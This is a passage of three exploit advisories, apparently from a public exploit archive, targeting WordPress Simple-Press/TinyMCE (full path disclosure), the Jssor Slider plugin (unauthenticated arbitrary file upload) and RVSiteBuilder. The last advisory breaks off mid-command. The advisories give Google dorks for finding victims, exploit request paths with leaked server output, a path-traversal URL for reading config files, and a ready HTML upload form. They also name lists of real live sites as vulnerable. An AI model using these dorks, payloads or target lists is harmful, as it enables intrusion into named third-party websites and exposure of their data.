  7. ################################################################################################# # Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/06/2018 # Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com + dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr + cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net # Tested On : Windows and Linux # Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-200 [ Information Exposure ] An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. + CWE-399 [ Resource Management Errors ] + CWE-211 [ Information Exposure Through Externally-Generated Error Message ] + CWE-532 [ Information Exposure Through Log Files ] + CWE-538 [ File and Directory Information Exposure ] + CWE-199 [ Information Management Errors ] ################################################################################################# # Description : Every forum needs a decent editor, and with TinyMCE you get just that. Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience. This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre supplied with all editing essentials such as ‘bold’, ‘blockquote’, ‘spoiler’, ‘link’, ‘image’ and more. Settings allow you all the control you should need including the essential option of rejecting posts with embedded formatting. # Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png # Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png # According to Owasp Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. # Risk Factor : The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilites to steal configuration files regarding the web application or the rest of the operating system. For Example : Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2 In combination with, say, unproteced use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files. The sourcecode of index.php: <?php echo file_get_contents(getcwd().$_GET['page']); ?> An attacker crafts a URL like so: http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php with the knowledge of the FPD in combination with Relative Path Traversal <?php //Hidden configuration file containing database credentials. $hostname = 'localhost'; $username = 'root'; $password = 'owasp_fpd'; $database = 'example_site'; $connector = mysql_connect($hostname, $username, $password); mysql_select_db($database, $connector); ?> Disregarding the above sample, FPD can also be used to reveal the underlaying operation system by observing the file paths. Windows for instance always start with a drive-letter, e.g; C:\, while Unix based operating system tend to start with a single front slash. *NIX: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2 Microsoft Windows: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2 The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging all from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames. You can check here to full understand of the attack : owasp.org/index.php/Full_Path_Disclosure ################################################################################################# # Google Dorks : inurl:''/wp-content/plugins/simple-forum/editors/tinymce/'' intext:''proudly designed by dsquaredmedia.co.uk'' intext:''Website by NorthWorks'' intext:''Powered By WordPress | Voyage Theme'' intext:''Powered by WordPress & Mimbo Pro'' intext:''Web Site By dsixty'' intext:''© Mainostoimisto Underground Graphics 2012'' intext:''Grace Theme by Templatic" intext:''développé avec WordPress pour la DREAL Auvergne'' intext:''Site designed by amesDesign'' intext:''Responsive Theme powered by WordPress'' ################################################################################################# Full Path Disclosure Vulnerabilities => # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 # Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10 # Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11 # Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11 # Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10 # Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15 Access Denied # Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10 # Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10 Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql Database: simple:press forum Version 4.2.2 Exploit : /wp-content/plugins/simple-forum/install/install-error.log Simple Forum İnstallation Log Files Exploit : /wp-content/plugins/simple-forum/install/sf-install.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10 /wp-content/plugins/simple-forum/install/sf-upgrade.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10 It gives same error : /wp-login.php?action=login&view=forum /wp-login.php?action=register&view=forum /wp-login.php?action=lostpassword&view=forum /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress. Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm ################################################################################################# # Example Site for Full Path Disclosure and SQL Injection Vulnerability => + University of Washington - Departments Web Server Information Technology WebSite is Vulnerable. Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80 depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR Errors displaying on the page : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18 {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}} ################################################################################################# Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html ################################################################################################# # Example Sites => depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php blogs.uprm.edu/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php americanclublyon.org/site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php ounasvaaranlatu.fi/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php alliancechristiancenter.org/development/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php churchoffrancisdesales.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php mudslingerevents.com/blog/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php preux-volley-ball.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php muenterprises.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php kjergaardsports.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php confemen.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php veda.com.ng/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lisasee.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php soulographie.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php lunadanceinstitute.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php plaisance-port-leucate.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php shiatsu-angers.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php supremeroofing.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php automaxrecruitingandtraining.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php slulabservices.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
  8. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  9. ################################################################################################# # Exploit Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Hosting Provider Serious Multiple Vulnerabilities # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team # Date : 11/06/2018 # Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com ~ + dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com # Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/ + twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_ # Version : All Versions # Google Dork : inurl:''/rvsindex.php/'' # Tested On : Windows and Linux Operating Systems # Category : WebApps # Exploit Risk : Medium and High # CWE : CWE-209 [ Information Exposure Through an Error Message ] + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-200 [ Information Exposure ] + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ] + CWE-592 [ Authentication Bypass Issues ] + CWE-23 [ Relative Path Traversal ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] + CWE-36 [ Absolute Path Traversal ] + CWE-538 [ File and Directory Information Exposure ] + CWE-548 [ Information Exposure Through Directory Listing ] # CxSecurity : cxsecurity.com/ascii/WLB-2018060101 ################################################################################################# # Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Site Builder for WebHosts [ Hosting Provider ] 2018 Serious Multiple Vulnerabilities # Description : RVglobalsoft is the leading software solutions for hosting provider. # Vulnerabilities and Exploits includes => 1) Full Path Disclosure Vulnerability 2) SQL Injection Vulnerability 3) Arbitrary File Upload Vulnerability 4) Arbitrary File Download Database Backup .sql Vulnerability 5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter 6) Blog Administration Control Panel Authentication Bypass Vulnerability 7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing 8) Information Exposure Through an Error Message 9) Permissions, Privileges, and Access Controls # Google Dork 1 : inurl:''/rvsindex.php/'' # Google Dork 2 : inurl:''/rvsindex.php?/user/login'' # Google Dork 3 : inurl:''/rvsindex.php/user/register'' # Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js ################################################################################################# # RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ Critical Vuln for Server Rooting ] => TARGET/blog/rvsindex.php?/sitebuilder/action/list/ Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/FrontController.php on line 257 Strict Standards: Declaration of SGL_MDB2::query() should be compatible with MDB2_Driver_Common::query($query, $types = NULL, $result_class = true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82 Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() should not be called statically, assuming $this from incompatible context in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60 Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS/public_html/rvscommonfunc.php on line 174 Please contact your host provider ssh as root to server and run. FOR CPANEL => pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi FOR DİRECTADMİN => pear install -f 